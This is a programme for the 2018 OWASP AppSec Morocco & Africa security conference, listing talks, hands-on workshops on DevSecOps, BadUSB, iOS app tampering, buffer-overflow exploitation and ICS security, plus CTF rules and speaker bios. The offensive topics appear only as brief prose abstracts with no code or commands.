• 15 Nov
    Day 1
  • Night 15-16 Nov
    Day 2
  • 16 Nov
    Day 3
  • Conferences & Workshops
Attendees - Coffee and Registration

Attendees - Coffee, welcome and Registration

09:30 - 10:00 Tarik El Aouadi & Alaeddine Mesbahi
OWASP AppSec Introduction

Welcome to OWASP Annual AppSec Morocco & Africa Cyber Security Conference, the premier application and cyber security conference for African developers and security experts. AppSec Morocco & Africa provides attendees with insight into leading speakers for application security and cyber security, workshops hands-on sessions on various applications, mobile, IoT ICS/SCADA, networking, connections and exposure to the best practices in cybersecurity. The event has eight conferences and eight different hands-on workshop programs between Thursday 15th and Friday 16th of November 2018. This is an exceptional opportunity to attend one of the many workshop hands-on courses offered by various well known, industry experts, and future pioneers of the application and cyber security industry. They are talks, for pen-testers and ethical hackers, developers and security engineers, DevOps practices and GRC/risk level talks for managers and CISOs. This year's conference program will focus on the bottom to the top and top to the bottom in application security based on the SABSA framework and TOGAF 9 EA framework. We offer also a Capture The Flag. Welcome.

10:00 - 10:30 Azzeddine Ramrami
Keynote session: Toward a Safer and More Secure Cyberspace

Given the growing importance of cyberspace to nearly all aspects of national life, a secure cyberspace is vitally important to the nation, but cyberspace is far from secure today.

Morocco, Africa faces the real risk that adversaries will exploit vulnerabilities in the nation’s critical information systems, thereby causing considerable suffering and damage. Online e-commerce business, government agency files, and identity records are all potential security targets.

Toward a Safer and More Secure Cyberspace examines these Internet security vulnerabilities and offers a strategy for future research aimed at countering cyber attacks.

It also explores the nature of online threats and some of the reasons why past research for improving cybersecurity has had less impact than anticipated, and considers the human resource base needed to advance the cybersecurity research agenda.

This talk will be an invaluable introduction for Internet security professionals, information technologists, policy makers, data stewards, e-commerce providers, consumer protection advocates, and others interested in digital security and safety.


Author's Bio: Azzeddine RAMRAMI
Azzeddine RAMRAMI is a Senior Security Architect at IBM Security and working as researcher in cyber security at IBM Security X-Force.
Azzeddine RAMRAMI is alos the chapter leader for OWASP Morocco and the president of OWASP Africa.

Coffee Break & Networking

Coffee Break & Networking You may need to visite our sponsors exhibit booth for product demo, discussion and more while enoying a good moroccan's tea.

11:00 - 11:30 Rali Kettani
Jumpstarting your DevSecOps Pipeline with IAST and RASP

Target Audience: Architects, Developers, Cybersecurity Specialist, Programmers
Prerequisites: Basic Security Software Knowledge
Domain: DevSecOps


DevSecOps is so much more than "automating the scan button." In this talk, we will create a continuous, effective, and scalable DevSecOps pipeline using only *free* tools.  We'll use IAST (Interactive Application Security Testing) to accurately pinpoint vulnerabilities in real time without scanning.

Then we'll set up RASP (Runtime Application Self-Protection) to gain comprehensive visibility of attacks in operations and prevent exploits.  And we'll integrate all of this security vulnerability and attack telemetry into the tools your teams are already using.

  • We will enable developers with real-time security feedback right in their IDE
  • We will also ensure that libraries are frameworks are analyzed continuously for vulnerabilities
  • We'll integrate security into the CI/CD process so that we can easily fail a build
  • We'll identify application layer attacks and create a whole new level of visibility for your SOC
  • We'll even prevent exploitation of newly discovered vulnerabilities in open source libraries


  • After this talk, you'll be able to establish your own DevSecOps pipeline immediately. This reference architecture can be adapted easily to almost any tools and processes -- even legacy applications and waterfall style projects.

    Author's Bio: Rali Kettani

    Rali Kettani is a Solutions Architect with Contrast Security, an IAST and RASP company that helps organizations incorporate security at the DevOps speed. He has been in the technology field for over 15 years, with a big chunk of it in application security. Rali has a background in software development with an extensive experience with SAST, IAST and RASP technologies. He has successfully helped dozens of Fortune 500 companies and US government entities to modernize their Application Security practice and switch into DevSecOps.

    Rali has a Masters degree in Management Information Systems from the George Washington University and a Bachelor’s degree in Computer Science from the Georgia College. Rali is based out of Washington DC

    11:30 - 12:00 Alaeddine Mesbahi
    Secience of Software Security Assessments


    Target Audience: Architects, Developers, Cybersecurity Specialist, Programmers
    Prerequisites: Basic Security Software Knowledge
    Domain: Offensive Security


    Offensive Security has long been an esoteric knowledge, discussed in closed circles among select groups, shared as black magic recipes with secret ingredients. A lot has changed since the days of IRC chat rooms, 0-days exchanges and invite only conferences. Security is now taught at schools, published in books and presented at conferences.

    Despite this progress, offensive security is in its most parts a manual process performed by pentesters, bug hunters or weekend enthousiast. Most tools is use both - open source and commercial - are glorified brute forcers that tests large set of inputs hoping to find the one that works.

    New Research and progress has however been made in the past few years like:

  • Introducing techniques from the world of machine learning for fuzzing, like reinforcement learning for input mutation and deep learning for dictionary inference
  • Enhancing taint tracking for both source code and binary analysis
  • Tree based testing for black box assessment of web applications


  • This presentation focuses on the most astonishing progress made in this area, and share our experience implementing and running these techniques to target web, mobile and systems applications as part of the largest security scanning infrastructure in the world. We will present the challenges that software assessment present, like path explosion, formalisation or simply the sheer randomness of the world of web and standards.

    Author's Bio: Alaeddine Mesbahi works as a Security Engineer at Google specialized in penetration testing and security source code review.

    He is in his own words a Python addict, self-proclaimed green mint tea expert. He enjoys learning new stuff about InfoSec every day, losing at chess and practicing martial arts. Alaeddine holds the Offensive Security Certified Professional (OSCP) and Offensive Security Certified Expert (OSCE) certifications.

    12:00 - 12:30 Amine El Boukhari
    Penetration tests on web services


    Target Audience: Architects, Developers, Cybersecurity Specialist, Programmers
    Prerequisites: Basic Security Software Knowledge
    Domain: API and Web Services


    First, an overview of how the web services actually work,

    Second, why they are critical and vulnerable, and finally the main and critical vulnerabilities that we encountered today on the penetration testing engagements.

    I will also present a brief demonstration of the tools and the methodology of a web service pentration testing.
    Author's Bio: Amine El Boukhari
    Amine El Boukhari is a senior cyber security consultant and a penetration tester working at KPMG Paris. He leads a various engagements and had the opportunity to be involved in a lot of web services penetration testing engagements.

    Lunch & Networking

    We will discuss during an authentic Moroccan Tajine. Enjoy.  

    14:00 - 17:30 Workshop 1 – Abdessamad Temmar
    Automated DevSecOps Infrastructure Deployment: Recipes to secure your devops tool chain

    Target Audience: Architects, Developpers, Cybersecurity Specialist, Programmers
    Prerequisites: Strong Security Software Knowledge,
    Domain: DevSecOps


    Securty is becoming an increasingly important concern during the lifecycle of developing application especially for those using the concept of fast (and furious) continuous delivery, and frequent release cycle.

    In this workshop, participants will learn who to easily configure/map security tools to their existing DevOps toolchain, and who to automate this process using cloud-infrastructure automation tools.

    The aim is to introduce security controls at the early stage of software development (controls while the developer is coding in his own machine), and before pushing code to the mutualized code repo (version control tool), and finally before (and after) deploying code to the production environment.

    The workshop provide also technical demo on how to make sure that initial fixed security requirements are always respected by the production environment through "continuous security monitoring".

    Author's Bio: Abdessamad TEMMAR
    Abdessamad TEMMAR is an information security consultant at Abcit, a Moroccan firm fully dedicated to information security. He worked through a variety of sources to provide security professional services to clients.

    Abdessamad is also a member of the OWASP Proactive controls Project, where he contributes in the update of his Top-Ten document, and also a co-author o the Mobile Security Tesing guide
    https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide#tab=Acknowledgemen
    and
    https://www.owasp.org/index.php/OWASP_Proactive_Controls

    14:00 - 17:30 Workshop 2 – Boumediene KADDOUR
    Decrypting SSL traffic using malicious smart phone and USB sticks


    Target Audience: Architects, SOC Analyst, Cybersecurity Specialist, Programmers
    Prerequisites: Strong Security Software Knowledge, Basic Assembly Language, Hardware knowledge
    Domain: Ethical Hacking


    Most of computer users avoid risks coming from removable media throughout performing an antivirus scan or formatting the entire disk, thinking that all viruses are wiped out from the disk located on the mass storage area of the USB.

    Security researchers have revealed a vulnerability within some microcontroller on the USB that is hidden from the user, and not accessible by antiviruses and security controls, this hidden area on the USB has been leveraged by criminals and hackers to store malwares to be executed automatically when the USB device is plugged on a computer.

    One of the recent techniques mostly used is the USB HID Keyboard attack, this attack makes a USB flash drive impersonating a Human Interface Device (HID) such as keyboard to execute commands automatically and hijack the computer. The same techniques is now applied within smart phones, which extends the risk for end users.

    In this workshop, we are going to provide as many as such scenarios with full hands-on demonstrating how computers and phones can easily be exploitable by these reprogrammed firmwares,and how a smart phone can easily be turned on to a rogue device or BadUSB to steal peoples sensitive information like facebook chats and email credentials with SSL turned on.

    Our added value in this talk is to represent how we can easily request the browsers (chrome & firefox) to store SSL master keys within a file of our choice that's sent to our gmail account via our installed script deployed by the smart phone, and then easily use those Master keys to eventually decrypt encrypted data.

    Author's BIO: Boumediene KADDOUR is a cyber defense consultant, he holds OSCP and OSWP certified. He worked Infosec Thief Trainer before, also as Incident Handler, and Cyber Defense Consultant in Dubai with a company called Malcrove.
    He participated in many international Seminars where he animated cyber security talks as professional speaker.

    14:00 - 17:30 Workshop 3 – Benjamin NABET
    Modifying an official and trusted iOS application to make it malicious

    Target Audience: Architects, SOC Analyst, Cybersecurity Specialist, Programmers
    Prerequisites: 
    Mandatory: MacOS, XCode -  
    Good to know: Objective C and ARM basis - 
    Nice to have : Jailbreaked iPhone

    Starting from an official iOS application published on the App Store, we'll learn how to reverse it in order to embeds malicious code and share it. Showing how to dump and decrypt the code (ARM reversing, MACH-O architecture, ...), we'll pass through the basis of debugging on the target (dynamic inspection) to analyze the app and spot the sensitive functions and data. We'll show then how to modify the code, resigning the app and share the malicious version.

    Author's Bio:
    Benjamin NABET - 
    CEO at BESURE (www.bsecure.fr)
    Benjamin works in the cybersecurity from 2002. He owns Bsecure, a french company, from 2010 and provides security consultancy for both big companies and SMB. Fond of mobile security, he started in mobile security application since 2009 and helped well known companies in securing their apps.

    • Capture the Flag Challenges
    08:00pm - 08:00am Capture The Flag Details
    CTF Start at 8pm on November 15, 2018


    The challenge will start on Thursday 15-09-2018 20:00 and end on the next day at 08:00 Moroccan time.

    All participants must be physically present at the location of the CTF (Hotel Val d’Infa Casablanca).

    Support will be given in person and using a communication channel shared before the beginning of the challenge.

    In order to be eligible for the prizes and be a part of the competition, you must abide by the following rules:

  • Teams are composed of 3 to 5 players
  • Do not attack the infrastructure. If you find a problem with one of the tasks, please report to it to the organisation team
  • You are not allowed to attack other them. Any attempt to cheat on the contest will lead to immediate disqualification
  • Only team members that are present to the CTF location can be part of the contest. Requesting help from members outside of the event location will lead to immediate disqualification
  • The winner will be the team that collected the maximum point
  • Requesting hints in private is forbidden. Hints will be shared with all teams
  • If two teams have equal scores, the team that got to that score first will have the advantage
  • In order to be eligible for money prizes, the top 3 teams are expected to deliver write-ups. Write-ups will be made public and shared on the OWASP conference website
  • We reserves the right to disqualify teams if the write-ups are not sufficiently complete
  • The organisation team of the conference are not allowed to participate to the challenges
  • Be respectful of other participants and report any misconduct or discrimination


  • Registration will be open on 30 October 2018. Please stay connected.

    Be your best!

    • Conferences, Workshops & Bug Bounty
    8:30 - 9:30 Attendees - Coffee and Registration

    09:00 - 16:00 Bug Bounty Yogosha
    Bug Bounty All day with Yogosha (Part 1)

    Target Audience: Architects, Developers, Cybersecurity Specialist, Programmers Prerequisites: High skills on security and bug hunting Domain: Bug Bounty

    The four steps of your Bug Bounty

     
    • Define your target
    • Define your budget
    • Estimate the price of your bugs
    • Validate and reward bug reports submitted by our researchers
    We will discuss the following during two wokshop sessions:
    • What are the advantages of a bug bounty?
    • How does the platform work?
    • How are Yogosha security researchers selected ?
    • How can I be sure that no researcher will damage my IT?
    • What if two researchers report the same vulnerability?
    • What does CVSS mean?
    • How to estimate the price of a vulnerability?
    • What’s the price of a bug bounty?
    • Is the plateforme secure ?
    Author's BIO: Yassir Kazar Yassir Kazar is CEO of Yogosha

    09:00 - 12:30 Workshop 1 – Mohamed Oussama Lessis
    Windows Buffer Over Flow vulnerability - from vulnerability discovering to Exploit Writing

    Target Audience: Architects, Developers, Cybersecurity Specialist, Programmers Prerequisites: Basic Security Software Knowledge Domain: Exploit Developpement

    Description : In this Workshop we will look at how to exploit a Buffer Overflows on Windows systems. We will start from the very basics of reverse Engineering of a vulnerable application, discovering the Buffer Overflow issue and writing the exploit for that vulnerable application. Participants will examine various recognized Exploit Writing techniques. They will be led through a series of advanced topics and exercises based on real world and staged application examples to illustrate the concepts.

    Prérequis pour le lab : Un PC avec une VM Windows.

     

    Author's BIO: Mohamed Oussama Lessis

    Oussema Lessis, is a cyber security manager in EY. He is a Security enthusiast and researcher since an early age. He covered multiple topics including and not limited to :

     

    -          Penetration testing

    -          Red Team engagements

    -          Malware Analysis

    -          Social Engineering

    -          Exploit Writing

    -          Forensic investigation.

    09:00 - 12:30 Workshop 2 – Souri Abdelhalim
    Orchestrating containers with Kubernetes

    Target Audience: Architects,sysadmins, Developers, Cybersecurity Specialist,Devops enginners, Programmers, and everyone eager to learn new stuff.
    Prerequisites:
    Basic Security Software Knowledge
    A working knowledge of Linux (e.g., shells, SSH, and package managers)
    A basic understanding of web servers, particularly how they typically communicate, IPs, and ports
    Domain: DevSecOps

    Description : If you have heard about Docker, containers and kubernetes, but haven't much (or any!) experience yet, this will get you started with a fast-paced.

    In this workshop you'll learn :
    How to create/modify/intercate with container images
    Docker Client and Server running In Single or Distributed mode
    Build and publish your own custom images.
    Scanning your Image container
    Build your own penetration testing lab
    Gain basic understanding of Kubernetes Fundamentals
    Learn how to use Kubernetes in production
    Deploy and manage Docker containers using kubectl
    Setup ReplicaSets, Services and Deployments on Kubernetes
    Deploy Applications on Kubernetes
    Materials or downloads needed in advance : https://github.com/etadata/owasp-workshop/blob/master/README.md

    Bio: Abdelhalim Souri
    Bio: Abdelhalim Souri is a senior security engineer at N+ONE, a leading carrier-neutral datacenter company in Morocco.
    His interests include secdevops and studies of how to apply machine learning to detect eventual security flaws.
    He also enjoys participating into competitive programming contests.

    09:00 - 12:30 Workshop 3 – IoT ICS/SCADA Security & Hacking
    IoT ICS/SCADA Security & Hacking

    Target Audience: Architects, SOC Analyst, Cybersecurity Specialist, Programmers Prerequisites: Strong Security Software Knowledge, Basic Assembly Language Level: Hardware Security

    Securing control systems is a challenge. Off the-shelve software and hardware as well as remote access possibilities in industrial environments increase continuously. The broader threat landscape and increased sophistication of attacks indicate the need to bolster the security poster of Operational Technology (OT) and in particular industrial control systems (ICS) and SCADA environments. But where to begin?
    Workshop Contents:

    • ICS fundamentals and ICS framework - ICS basics - Developing governance and ICS framework - Risk Management in ICS
    • Controls and solutions - Incident management - Network segmentationSecurity monitoring - Remote access security - Patching and malware prevention - Portable media security
    • Practical approach - Case studies from practice - Active and passive security assessments - Building security operating model - Security roadmap in ICS organisations

    Author's Bio: Azzeddine RAMRAMI
    Azzeddine RAMRAMI is a Senior Security Architect at IBM Security and working as researcher in cyber security at IBM Security X-Force.
    Azzeddine RAMRAMI is alos the chapter leader for OWASP Morocco and the President of OWASP Africa.

    12:30 - 14h30 Lunch & Networking

    14:30 - 15:00 Franck Thicot
    Considerations on implementing regulation requirements to protect critical applications


    Target Audience: Architects, Developers, Cybersecurity Specialist, Programmers
    Prerequisites: Basic Security Software Knowledge
    Level: Practicing


    Presentation of the key requirements
    Challenges to implement them
    Approach scenarios selected in the context of a financial services organization results and lessons learned

    15:00 - 15:30 Amina Dik
    Sécurité et fraude en informatique : Aspects juridiques


    Target Audience: Architects, Developers, Cybersecurity Specialist, Programmers
    Prerequisites: No requirement
    Level: Regulation


    Points à présenter/discuter :
    I – Mesures réprimant la fraude des systèmes d’informations
    1 - Accès frauduleux et maintien dans un système d’information
    2- Atteintes volontaires au fonctionnement d’un système informatique
    II – Mesures réprimant la fraude relative aux données
    1. Atteintes à l’intégrité des données
    2. Atteintes relatives au traitement de données à caractère personnel
    III- L’arsenal organisationnel de lutte contre la fraude informatique
    1. Les moyens institutionnels de lutte contre la fraude informatique
    2. Les outils de la coopération judiciaire
    IV - Encadrement juridique de la sécurité informatique
    1. Recommandations et lignes directrices des partenaires de la sécurité
    2. La régulation en matière de protection des données à caractère personnel
    V- Les obligations légales de sécurité
    1. Le manquement à l'obligation de sécurité
    2. L’obligation de notification des failles de sécurité
    3. L’étendue et les limites de l’obligation de déchiffrement

    Author's BIO: Amina DIK
    Ingénieur en chef chargée d’études au ministère de la Justice, Amina Dik est doctorante en sciences de l’ingénieur à la faculté des Sciences à Rabat.
    Elle a également poursuivi le cursus juridique depuis le début pour aboutir à l’obtention d’un doctorat en droit privé.
    Elle consent mettre cette bipolarisation de sa formation pour inciter les juristes et les ingénieurs à rimer ensemble pour répondre aux demandes de sécurité juridique qui sont liées à une demande de sécurité technique.

    15:30 - 16:00 Hassan CHARRAF
    La quete du bonheur dans un monde digital


    Target Audience: All
    Prerequisites: Que du bonheur
    Level: Keep Cool


    Nous vivons dans un monde plein de mutations et de changements auxquels personne ne peut plus y echapper.
    Le défi technologique apporte à la fois des solutions mais aussi plus de contraintes.
    Serions nous plus heureux ou allons nous passer à côté de l essentiel ?


    Author's BIO: Hassan Charraf
    Ingénieur d'Etat 1989
    MBA de l'Université de Sherbrooke - Québec
    Doctorant chercheur à l’Académie de management de Paris sur le.bonheur
    Vice président CIDEC centre international pour le developpement et la cooperation
    Past Président CJD Maroc
    Vice-Président AMDUS
    Past Administrateur au sein d’INMA – SA
    Ex Directeur Général de l'Omnium International du Commerce et de l'industrie
    Ex Directeur des Études Stratégiques et de la Planification (Groupe pétrolier)
    Ex Directeur d'organisation et Systémes d'informations ( Groupe Industriel )
    Ex Membre de la commission Emploi et relations sociales ( CGEM )
    Expert développement Humain Projets Européens - MEDA2 FP -
    Expert Marché du Travail Projets Européenns - MEDA 2 FP -
    Expert Entrepreneuriat & Investissement Diaspora Projets Européens ( ACEDIM - PACEIM - DIAMED - MAGHRIB ENTREPRENEURS )
    Past Administrateur de INTENT
    Conférencier International

    16:00 - 16:30 Coffee Break & Networking

    16:30 - 17:00 Yassir Kazar
    Cyber Sécurité : Retour Vers le Futur

    Bio : Passionné par la cybersécurité, Yassir Kazar est un serial entrepreneur qui a monté sa première startup alors qu’il terminait ses études. Par la suite, il fera carrière dans les services informatique et deviendra staff manager en Business Intelligence chez CGI tout en enseignant l’informatique décisionnelle aux masters de Paris V. Il a participé au lancement de la branche locale de l’Open Knowledge Foundation ainsi qu’à celle de OuiShare, un thinktank dédié à l’économie collaborative. En 2015, il fonde Yogosha, « défenseur » en japonais, une plateforme de confiance pour Bug Bounties privé qui ambitionne de rayonner tant en Europe, qu’en Afrique et au Moyen-Orient.

    17:00 - 17:30 STAFF
    Conlusion and CTF Winners Bug Bounty Winners

    CTF description and registration will be managed via a Google form. We will publish more information this week.